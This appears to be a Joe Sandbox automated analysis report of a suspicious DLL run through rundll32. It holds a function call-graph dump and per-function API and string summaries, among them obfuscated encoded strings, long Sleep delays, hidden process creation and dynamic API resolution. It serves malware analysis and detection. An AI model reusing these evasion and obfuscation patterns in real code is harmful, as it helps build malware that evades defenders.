14028->14029 14030 6cdf2a99 14029->14030 14030->14023 14032 6cdf105f __DllMainCRTStartup@12 14031->14032 14058 6cdfa8c7 14032->14058 14036 6cdf1bb9 ExpandEnvironmentStringsW 14035->14036 14037 6cdf1bb7 14035->14037 14038 6cdf1bd1 14036->14038 14037->14036 14038->14038 14040 6cdf1be5 __fread_nolock 14038->14040 14090 6cdf2439 14038->14090 14041 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14040->14041 14042 6cdf1c30 VariantInit VariantInit VariantInit VariantInit 14041->14042 14042->13296 14044 6cdf11b6 __EH_prolog3 14043->14044 14045 6cdf2d38 __DllMainCRTStartup@12 52 API calls 14044->14045 14046 6cdf11bf 14045->14046 14047 6cdf11cd SysAllocString 14046->14047 14048 6cdf11ee 14046->14048 14047->14048 14049 6cdf2b50 __DllMainCRTStartup@12 mydllmain 14048->14049 14051 6cdf1201 __DllMainCRTStartup@12 14048->14051 14050 6cdf1215 14049->14050 14051->13305 14053 6cdf1221 14052->14053 14055 6cdf1233 __DllMainCRTStartup@12 14052->14055 14053->14055 14097 6cdf1244 14053->14097 14055->13307 14057 6cdf2264 14056->14057 14059 6cdfa8db __wsopen_s 14058->14059 14060 6cdfa8fd 14059->14060 14062 6cdfa924 14059->14062 14061 6cdfbc5d __wsopen_s 33 API calls 14060->14061 14063 6cdfa918 14061->14063 14067 6cdf642c 14062->14067 14065 6cdf5f8b __wsopen_s 50 API calls 14063->14065 14066 6cdf1078 CoUninitialize 14065->14066 14066->13301 14068 6cdf6438 __FrameHandler3::FrameUnwindToState 14067->14068 14075 6cdfaebd EnterCriticalSection 14068->14075 14070 6cdf6446 14076 6cdf83aa 14070->14076 14075->14070 14077 6cdff4b0 __DllMainCRTStartup@12 51 API calls 14076->14077 14078 6cdf83d1 __DllMainCRTStartup@12 14077->14078 14079 6cdf86a8 __DllMainCRTStartup@12 59 API calls 14078->14079 14080 6cdf8418 14079->14080 14081 6cdf836c __DllMainCRTStartup@12 17 API calls 14080->14081 14082 6cdf8425 14081->14082 14083 6cdff55b __DllMainCRTStartup@12 75 API calls 14082->14083 14084 6cdf8432 14083->14084 14085 6cdf2d25 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14084->14085 14086 6cdf6453 14085->14086 14087 6cdf647b 14086->14087 14088 6cdfaed1 __fread_nolock LeaveCriticalSection 14087->14088 14089 6cdf6464 14088->14089 14089->14063 14091 6cdf24a8 14090->14091 14092 6cdf2453 __DllMainCRTStartup@12 14090->14092 14093 6cdf119f __DllMainCRTStartup@12 52 API calls 14091->14093 14095 6cdf25a0 __DllMainCRTStartup@12 52 API calls 14092->14095 14094 6cdf24ad 14093->14094 14096 6cdf246b __fread_nolock 14095->14096 14096->14040 14098 6cdf124c SysFreeString 14097->14098 14099 6cdf1257 14097->14099 14098->14099 14099->14055 14100->12765 14102 6cdf3457 ___scrt_release_startup_lock 14101->14102 14103 6cdf345b 14102->14103 14106 6cdf3467 __DllMainCRTStartup@12 14102->14106 14130 6cdfc8fe 14103->14130 14105 6cdf3465 14105->12639 14107 6cdf3474 14106->14107 14134 6cdfc0e7 14106->14134 14107->12639 14218 6cdf4386 InterlockedFlushSList 14110->14218 14113 6cdf376a 14114 6cdf377a 14113->14114 14115 6cdf3792 14113->14115 14114->14115 14116 6cdf3781 mydllmain 14114->14116 14115->12644 14116->14114 14118 6cdf35ff 14117->14118 14119 6cdf2f59 14118->14119 14222 6cdfcaa7 14118->14222 14123 6cdf2f95 14119->14123 14121 6cdf360d 14229 6cdf43db 14121->14229 14321 6cdf3475 14123->14321 14127 6cdf3637 __fread_nolock CallUnexpected 14126->14127 14128 6cdf36e2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14127->14128 14129 6cdf3726 CallUnexpected 14128->14129 14129->12643 14131 6cdfc90a __EH_prolog3 14130->14131 14145 6cdfc7c9 14131->14145 14133 6cdfc931 __DllMainCRTStartup@12 14133->14105 14135 6cdfc125 14134->14135 14136 6cdfc114 14134->14136 14172 6cdfbfb2 14135->14172 14164 6cdfc1af GetModuleHandleW 14136->14164 14141 6cdfc163 14141->12639 14146 6cdfc7d5 __FrameHandler3::FrameUnwindToState 14145->14146 14153 6ce015d1 EnterCriticalSection 14146->14153 14148 6cdfc7e3 14154 6cdfc824 14148->14154 14153->14148 14155 6cdfc843 14154->14155 14158 6cdfc7f0 14154->14158 14156 6cdfc8d1 14155->14156 14157 6cdfc884 mydllmain 14155->14157 14155->14158 14156->14158 14159 6cdfe224 ___free_lconv_mon 17 API calls 14156->14159 14157->14155 14160 6cdfc818 14158->14160 14159->14158 14163 6ce01619 LeaveCriticalSection 14160->14163 14162 6cdfc801 14162->14133 14163->14162 14165 6cdfc119 14164->14165 14165->14135 14166 6cdfc20a GetModuleHandleExW 14165->14166 14167 6cdfc26a 14166->14167 14168 6cdfc249 GetProcAddress 14166->14168 14170 6cdfc279 14167->14170 14171 6cdfc270 FreeLibrary 14167->14171 14168->14167 14169 6cdfc25d mydllmain 14168->14169 14169->14167 14170->14135 14171->14170 14173 6cdfbfbe __FrameHandler3::FrameUnwindToState 14172->14173 14187 6ce015d1 EnterCriticalSection 14173->14187 14175 6cdfbfc8 14188 6cdfbfff 14175->14188 14180 6cdfc17e 14206 6cdfc1f1 14180->14206 14182 6cdfc188 14183 6cdfc19c 14182->14183 14184 6cdfc18c GetCurrentProcess TerminateProcess 14182->14184 14185 6cdfc20a CallUnexpected 4 API calls 14183->14185 14184->14183 14186 6cdfc1a4 ExitProcess 14185->14186 14187->14175 14189 6cdfc00b __FrameHandler3::FrameUnwindToState CallUnexpected 14188->14189 14190 6cdfc059 14189->14190 14194 6cdfc049 mydllmain 14189->14194 14197 6cdfbfd5 14189->14197 14191 6cdfc06f 14190->14191 14195 6cdfc8fe __DllMainCRTStartup@12 18 API calls 14190->14195 14192 6cdfc08c 14191->14192 14201 6cdfbdf3 14191->14201 14193 6cdfbdf3 CallUnexpected mydllmain 14192->14193 14193->14197 14194->14190 14195->14191 14198 6cdfbff3 14197->14198 14205 6ce01619 LeaveCriticalSection 14198->14205 14200 6cdfbfe1 14200->14141 14200->14180 14202 6cdfbe01 14201->14202 14204 6cdfbe1a 14201->14204 14203 6cdfbe08 mydllmain 14202->14203 14202->14204 14203->14202 14204->14192 14205->14200 14209 6ce01655 14206->14209 14208 6cdfc1f6 CallUnexpected 14208->14182 14210 6ce01664 CallUnexpected 14209->14210 14211 6ce01671 14210->14211 14213 6cdff905 14210->14213 14211->14208 14214 6cdff880 _unexpected 5 API calls 14213->14214 14215 6cdff921 14214->14215 14216 6cdff939 14215->14216 14217 6cdff92a mydllmain 14215->14217 14216->14211 14217->14216 14219 6cdf4396 14218->14219 14221 6cdf2f3a 14218->14221 14220 6cdfb786 ___std_exception_copy 17 API calls 14219->14220 14219->14221 14220->14219 14221->14113 14223 6cdfcac4 14222->14223 14224 6cdfcab2 14222->14224 14238 6ce02c2a 14223->14238 14226 6cdfcac0 14224->14226 14235 6cdffed8 14224->14235 14226->14121 14230 6cdf43ee 14229->14230 14231 6cdf43e4 14229->14231 14230->14119 14295 6cdf4514 14231->14295 14242 6cdffd69 14235->14242 14239 6cdfcad3 14238->14239 14241 6ce02c38 14238->14241 14239->14121 14240 6ce02c40 mydllmain 14240->14241 14241->14239 14241->14240 14245 6cdffcbd 14242->14245 14246 6cdffcc9 __FrameHandler3::FrameUnwindToState 14245->14246 14253 6ce015d1 EnterCriticalSection 14246->14253 14248 6cdffcd3 ___scrt_uninitialize_crt 14249 6cdffd3f 14248->14249 14254 6cdffc31 14248->14254 14262 6cdffd5d 14249->14262 14253->14248 14255 6cdffc3d __FrameHandler3::FrameUnwindToState 14254->14255 14265 6cdfaebd EnterCriticalSection 14255->14265 14257 6cdffc80 14279 6cdffcb1 14257->14279 14258 6cdffc47 ___scrt_uninitialize_crt 14258->14257 14266 6cdffe73 14258->14266 14294 6ce01619 LeaveCriticalSection 14262->14294 14264 6cdffd4b 14264->14226 14265->14258 14267 6cdffe88 __wsopen_s 14266->14267 14268 6cdffe8f 14267->14268 14269 6cdffe9a 14267->14269 14270 6cdffd69 ___scrt_uninitialize_crt 79 API calls 14268->14270 14271 6cdffe0a ___scrt_uninitialize_crt 75 API calls 14269->14271 14272 6cdffe95 14270->14272 14273 6cdffea4 14271->14273 14274 6cdf5f8b __wsopen_s 50 API calls 14272->14274 14273->14272 14275 6cdfcc82 __fread_nolock 50 API calls 14273->14275 14276 6cdffed2 14274->14276 14277 6cdffebb 14275->14277 14276->14257 14282 6ce05b15 14277->14282 14293 6cdfaed1 LeaveCriticalSection 14279->14293 14281 6cdffc9f 14281->14248 14283 6ce05b33 14282->14283 14284 6ce05b26 14282->14284 14286 6ce05b7c 14283->14286 14289 6ce05b5a 14283->14289 14285 6cdfe211 __dosmaperr 17 API calls 14284->14285 14287 6ce05b2b 14285->14287 14288 6cdfe211 __dosmaperr 17 API calls 14286->14288 14287->14272 14290 6ce05b81 14288->14290 14291 6ce05a73 ___scrt_uninitialize_crt 54 API calls 14289->14291 14292 6cdfbcda __wsopen_s 50 API calls 14290->14292 14291->14287 14292->14287 14293->14281 14294->14264 14296 6cdf451e 14295->14296 14297 6cdf43e9 14295->14297 14303 6cdf55e8 14296->14303 14299 6cdf5493 14297->14299 14300 6cdf549e 14299->14300 14302 6cdf54bd 14299->14302 14301 6cdf54a8 DeleteCriticalSection 14300->14301 14301->14301 14301->14302 14302->14230 14309 6cdf54c2 14303->14309 14306 6cdf560e mydllmain 14308 6cdf5618 14306->14308 14307 6cdf561a TlsFree 14307->14308 14308->14297 14310 6cdf54df 14309->14310 14313 6cdf54e3 14309->14313 14310->14306 14310->14307 14311 6cdf554b GetProcAddress 14311->14310 14313->14310 14313->14311 14314 6cdf553c 14313->14314 14316 6cdf5562 LoadLibraryExW 14313->14316 14314->14311 14315 6cdf5544 FreeLibrary 14314->14315 14315->14311 14317 6cdf55a9 14316->14317 14318 6cdf5579 GetLastError 14316->14318 14317->14313 14318->14317 14319 6cdf5584 14318->14319 14319->14317 14320 6cdf559a LoadLibraryExW 14319->14320 14320->14313 14326 6cdfcad7 14321->14326 14324 6cdf4514 ___vcrt_uninitialize_ptd 7 API calls 14325 6cdf2f9a 14324->14325 14325->12653 14329 6cdfd548 14326->14329 14330 6cdfd552 14329->14330 14332 6cdf347c 14329->14332 14333 6cdff9a3 14330->14333 14332->14324 14334 6cdff880 _unexpected 5 API calls 14333->14334 14335 6cdff9bf 14334->14335 14336 6cdff9da TlsFree 14335->14336 14337 6cdff9c8 mydllmain 14335->14337 14338 6cdff9d5 14337->14338 14338->14332 14339->12627

                  Executed Functions

                  Function 6CDF15A4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141fileCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • FindFirstFileW.KERNELBASE(?,00000000,42800FE9,000003E8,00000000,00000000,?,6CE0A62A,000000FF), ref: 6CDF165C
                  • TerminateProcess.KERNEL32(00000000), ref: 6CDF171F
                  • CloseHandle.KERNEL32 ref: 6CDF172B
                  • CloseHandle.KERNEL32 ref: 6CDF1737
                    • Part of subcall function 6CDF1795: __fread_nolock.LIBCMT ref: 6CDF1871
                  • FindNextFileW.KERNELBASE(00000000,00000000), ref: 6CDF1753
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: CloseFileFindHandle$FirstNextProcessTerminate__fread_nolock
                  • String ID: %s\%s$%s\*.*
                  • API String ID: 859259384-1665845743
                  • Opcode ID: daa46c265728f1e10271b7be5fa1ecebb2950890d2d91d0af766eb5ac405411b
                  • Instruction ID: 5e7857db29002d19b6464a18beda198aed04040c2ba8fcc881a50b29a8f28aa3
                  • Opcode Fuzzy Hash: daa46c265728f1e10271b7be5fa1ecebb2950890d2d91d0af766eb5ac405411b
                  • Instruction Fuzzy Hash: 9351D9B1A00288EBDF60DF65CC44BDD77B8FF48318F05452AE928D76A0DB749A49CB50
                  Function 6CDF2808 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 175sleepCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetEnvironmentVariableW.KERNEL32(?,?,00000032,?,?,?,?,?,?,?,?,00000001,00000000,?,00000000), ref: 6CDF28A9
                  • Sleep.KERNELBASE(000005DC,?,?,?,?,?,?,?,?,00000001,00000000,?,00000000), ref: 6CDF28C4
                  • Sleep.KERNELBASE(00007530,?,?,?,?,?,?,?,?,00000001,00000000,?,00000000), ref: 6CDF28CB
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6CDF2A0E
                  Strings
                  • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6CDF28CD
                  • %s%s, xrefs: 6CDF2916, 6CDF297A
                  • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6CDF2933
                  • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6CDF2833
                  • IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7B, xrefs: 6CDF2997
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: EnvironmentSleep$ExpandStringsVariable
                  • String ID: %s%s$IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7B$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
                  • API String ID: 861455210-3053068940
                  • Opcode ID: 849225d2624ff1fcbfb769b65df20eb43f01b53e5362d9c6911dbae3b889e611
                  • Instruction ID: 8b2cce811761a3b0ae0293af001adb6dda5805146fd3fb706382c418740a64f2
                  • Opcode Fuzzy Hash: 849225d2624ff1fcbfb769b65df20eb43f01b53e5362d9c6911dbae3b889e611
                  • Instruction Fuzzy Hash: E6515FB1408385AAC725DF60DC44DEBB7FCFF85208F41491EA9A587650DB35A60ECBA2
                  Function 6CDF141E Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125sleepprocessCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • Sleep.KERNELBASE(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BfdAoBKRBZRA{B@7BgBA7BKRB,?), ref: 6CDF1560
                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6CE14454), ref: 6CDF1583
                  Strings
                  • %s %s, xrefs: 6CDF1545
                  • TDl, xrefs: 6CDF14C0
                  • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BfdAoBKRBZRA{B@7BgBA7BKRB, xrefs: 6CDF14C5
                  • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6CDF1448
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: CreateProcessSleep
                  • String ID: %s %s$TDl$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BfdAoBKRBZRA{B@7BgBA7BKRB
                  • API String ID: 3229676899-3317557193
                  • Opcode ID: 478dc749a24c50df44ecbda8563248f8a9ba81afbeb5f1d3be66cde9e215a380
                  • Instruction ID: 07f9d998f9d597b6f556a33fbd93179fc871f09c5f8173809abb938d9037710a
                  • Opcode Fuzzy Hash: 478dc749a24c50df44ecbda8563248f8a9ba81afbeb5f1d3be66cde9e215a380
                  • Instruction Fuzzy Hash: EF4180B1508384BFD720DB64CC84EEBBBECFF89248F41491DB69586650EB34991DC7A2
                  Function 6CDF1000 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 110 6cdf1000-6cdf1005 111 6cdf100d-6cdf1014 call 6cdf2808 ExitProcess 110->111 112 6cdf1007-6cdf100a 110->112
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: 8731eebefaf75133d75445b54be57ed9d2ca1ae2cb0e9188cbb7d4ec126d73d6
                  • Instruction ID: 843ab81ce087ceb500f280a798c7b6aa4360eacd78d4853cd95031ee7ee6a3e7
                  • Opcode Fuzzy Hash: 8731eebefaf75133d75445b54be57ed9d2ca1ae2cb0e9188cbb7d4ec126d73d6
                  • Instruction Fuzzy Hash: EBB09231A95281D6C240A760844CB2AB6A4BF6234FF29C428E07980560CB2180AA9632

                  Non-executed Functions

                  Function 6CE03D30 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 362ef1cc790e621639e128e73b9871dfcc67a5d3f97bb9d42cbb1d692720c59a
                  • Instruction ID: 8f9114e3bcab13c2d5c7dbf33fd3d9098a92bd24c42997b547f7e8202b67d6a5
                  • Opcode Fuzzy Hash: 362ef1cc790e621639e128e73b9871dfcc67a5d3f97bb9d42cbb1d692720c59a
                  • Instruction Fuzzy Hash: 80026C71E012199BDB14CFA9C980ADEFBF1FF58318F24826AD519E7781D731A916CB80
                  Function 6CDF3621 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6CDF362D
                  • IsDebuggerPresent.KERNEL32 ref: 6CDF36F9
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDF3712
                  • UnhandledExceptionFilter.KERNEL32(?), ref: 6CDF371C
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                  • String ID:
                  • API String ID: 254469556-0
                  • Opcode ID: 1fc575a190d65336665f269fff2abba6c97669446670aae2d412a08b1bcab73d
                  • Instruction ID: 7057dce7e64a2dea43bb51cd22aebe137a5eefc2aeba7e31e8cd9947e0e0ab53
                  • Opcode Fuzzy Hash: 1fc575a190d65336665f269fff2abba6c97669446670aae2d412a08b1bcab73d
                  • Instruction Fuzzy Hash: 823127B5D05218DBDF20DFA4D9897CDBBB8BF08304F1141AAE41CAB250EB719A858F45
                  Function 6CE06329 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 275 6ce06329-6ce06359 call 6ce06105 278 6ce06374-6ce06380 call 6ce031ec 275->278 279 6ce0635b-6ce06366 call 6cdfe1fe 275->279 284 6ce06382-6ce06397 call 6cdfe1fe call 6cdfe211 278->284 285 6ce06399-6ce063e2 call 6ce06070 278->285 286 6ce06368-6ce0636f call 6cdfe211 279->286 284->286 295 6ce063e4-6ce063ed 285->295 296 6ce0644f-6ce06458 GetFileType 285->296 293 6ce0664e-6ce06652 286->293 300 6ce06424-6ce0644a GetLastError call 6cdfe1b7 295->300 301 6ce063ef-6ce063f3 295->301 297 6ce064a1-6ce064a4 296->297 298 6ce0645a-6ce0648b GetLastError call 6cdfe1b7 CloseHandle 296->298 304 6ce064a6-6ce064ab 297->304 305 6ce064ad-6ce064b3 297->305 298->286 312 6ce06491-6ce0649c call 6cdfe211 298->312 300->286 301->300 306 6ce063f5-6ce06422 call 6ce06070 301->306 309 6ce064b7-6ce06505 call 6ce03137 304->309 305->309 310 6ce064b5 305->310 306->296 306->300 317 6ce06524-6ce0654c call 6ce05e1a 309->317 318 6ce06507-6ce06513 call 6ce0627f 309->318 310->309 312->286 325 6ce06551-6ce06592 317->325 326 6ce0654e-6ce0654f 317->326 318->317 324 6ce06515 318->324 327 6ce06517-6ce0651f call 6ce005c8 324->327 328 6ce065b3-6ce065c1 325->328 329 6ce06594-6ce06598 325->329 326->327 327->293 330 6ce065c7-6ce065cb 328->330 331 6ce0664c 328->331 329->328 333 6ce0659a-6ce065ae 329->333 330->331 334 6ce065cd-6ce06600 CloseHandle call 6ce06070 330->334 331->293 333->328 338 6ce06602-6ce0662e GetLastError call 6cdfe1b7 call 6ce032ff 334->338 339 6ce06634-6ce06648 334->339 338->339 339->331
                  APIs
                    • Part of subcall function 6CE06070: CreateFileW.KERNEL32(00000000,00000000,?,6CE063D2,?,?,00000000,?,6CE063D2,00000000,0000000C), ref: 6CE0608D
                  • GetLastError.KERNEL32 ref: 6CE0643D
                  • __dosmaperr.LIBCMT ref: 6CE06444
                  • GetFileType.KERNEL32(00000000), ref: 6CE06450
                  • GetLastError.KERNEL32 ref: 6CE0645A
                  • __dosmaperr.LIBCMT ref: 6CE06463
                  • CloseHandle.KERNEL32(00000000), ref: 6CE06483
                  • CloseHandle.KERNEL32(00000000), ref: 6CE065D0
                  • GetLastError.KERNEL32 ref: 6CE06602
                  • __dosmaperr.LIBCMT ref: 6CE06609
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                  • String ID: H
                  • API String ID: 4237864984-2852464175
                  • Opcode ID: d3f22ef862b965942c272c16a11c98257fb83b5597d972cfd745b84c5de87379
                  • Instruction ID: 45b338f39885e80bcd4acd9d75af6a638e8c99389cca5c9b90409eb0be9cac87
                  • Opcode Fuzzy Hash: d3f22ef862b965942c272c16a11c98257fb83b5597d972cfd745b84c5de87379
                  • Instruction Fuzzy Hash: 5EA11332B041559FCF098F68C851BAE7BB5AB47328F24024DEC11DB791DB358966CBD1
                  Function 6CDF1274 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 149libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32.dll,000003E8,00000000,00000000), ref: 6CDF12AB
                  • GetProcAddress.KERNEL32(?), ref: 6CDF131D
                  • GetProcAddress.KERNEL32(?), ref: 6CDF1388
                  • GetProcAddress.KERNEL32(?), ref: 6CDF13F6
                  Strings
                  • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6CDF1395
                  • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6CDF12B1
                  • kernel32.dll, xrefs: 6CDF12A6
                  • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6CDF1325
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
